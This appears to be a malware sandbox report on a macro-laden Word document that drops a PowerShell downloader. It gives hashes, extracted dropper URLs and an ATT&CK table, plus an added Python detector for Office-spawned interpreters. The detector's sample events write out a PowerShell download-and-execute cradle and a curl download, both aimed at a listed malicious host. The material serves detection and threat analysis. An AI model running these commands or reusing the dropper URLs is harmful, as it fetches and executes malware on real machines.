General

  • Target

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc.zip

  • Size

    163KB

  • Sample

    230330-napxmadh3v

  • MD5

    ae45e8894a929683ca1b048c61099728

  • SHA1

    666615fba529b3143a4dcf59f494f5598f37810b

  • SHA256

    f01fa5992e33212148b2b57b7a027066e183edaca8e6c2bb031824766fcafdf5

  • SHA512

    e6cfe8824481286137fce10d0aafc3c2c09e99404d8464cf775f97df199be894f79ba2371b1be4a69d854a11d75d9dfd5899aae95a5f4af93fc1182e8957e36d

  • SSDEEP

    3072:Hn48Kle9DFhVuva/TKpSbNSC7MHeRQPi/rnusHVxuRzqoacZknBHsuaDZV2rxhmC:Hn48aejTuva/TK0bzgHeiPkH/uRzFdZU

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (exe.dropper)

    http://www.lbbsport.pl/Izmqs/
    http://www.isaac.samjoemmy.com/H9TF8/
    http://www.electrocad.in/4qTumjs/
    http://www.abilitymep.ae/mXss/
    http://www.efmj-eg.org/CdwOm/

Targets

    • Target

      28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc

    • Size

      235KB

    • MD5

      57a933abcd0a70f46006deb5c3d507a0

    • SHA1

      fd6892c482305d7a6edbb2356d8f19330f5ba87b

    • SHA256

      28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473

    • SHA512

      b41788f33df1171ddac802e85589cc59ef1b539ab2489e85c4912b5ea85012763afd3f024fe9467617329c2af840341089e64121e9217321258e71e98c337faf

    • SSDEEP

      3072:uH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq52yXJm9YBmjDRErQm:uFVeEsjdXRC3jexGG6NYWofREkm

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
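As an added example (not part of this sandbox report and not the sandbox's own signature logic), the following Python script implements the parent/child check behind the signature above and, for each hit, decodes a PowerShell -EncodedCommand payload (UTF-16LE base64) and matches any URLs it finds against the exe.dropper URLs from the extracted config on this page. The process-creation events are constructed for illustration; the Office-parent and script-child lists, the event field names and the encoded download stage are assumptions, not data from this report.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlparse

# Dropper URLs as listed in the extracted config on this page.
DROPPER_URLS = [
    "http://www.lbbsport.pl/Izmqs/",
    "http://www.isaac.samjoemmy.com/H9TF8/",
    "http://www.electrocad.in/4qTumjs/",
    "http://www.abilitymep.ae/mXss/",
    "http://www.efmj-eg.org/CdwOm/",
]
DROPPER_HOSTS = {urlparse(u).hostname for u in DROPPER_URLS}

# Assumption: Office binaries that should not normally spawn script interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: children whose appearance under an Office parent is the signature fired above.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?:-|/)(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Flag Office -> script-interpreter spawns; extract and attribute any URLs."""
    parent = basename(event["parent"])
    child = basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    searchable = cmdline if decoded is None else cmdline + " " + decoded
    urls = URL_RE.findall(searchable)
    known = sorted({u for u in urls if urlparse(u).hostname in DROPPER_HOSTS})
    return {"parent": parent, "child": child, "decoded_command": decoded,
            "urls": urls, "known_dropper_urls": known}


def triage(events) -> list:
    """Run analyze_event over a list of process-creation events; return the hits."""
    return [hit for hit in (analyze_event(e) for e in events) if hit]


# Constructed sample events (Sysmon-style fields, simplified). The encoded stage is
# an assumed download cradle, not the script recovered by the sandbox.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://www.lbbsport.pl/Izmqs/')"
ENCODED_STAGE = base64.b64encode(STAGE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -w hidden -enc {ENCODED_STAGE}"},
    {"parent": r"C:\Windows\explorer.exe",                      # benign: not an Office parent
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c curl http://www.efmj-eg.org/CdwOm/ -o %TEMP%\\x.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",                        # benign: print helper
     "cmdline": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only the two Word-spawned interpreters are reported; the explorer-launched PowerShell and the print helper are ignored even though one of them is also powershell.exe. Matching on the decoded payload matters because the URL in the first event never appears in the raw command line.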

MITRE ATT&CK Matrix ATT&CK v6

  Tactic           Technique                      Count   ID
  Defense Evasion  Modify Registry                1       T1112
  Discovery        Query Registry                 2       T1012
  Discovery        System Information Discovery   2       T1082

Tasks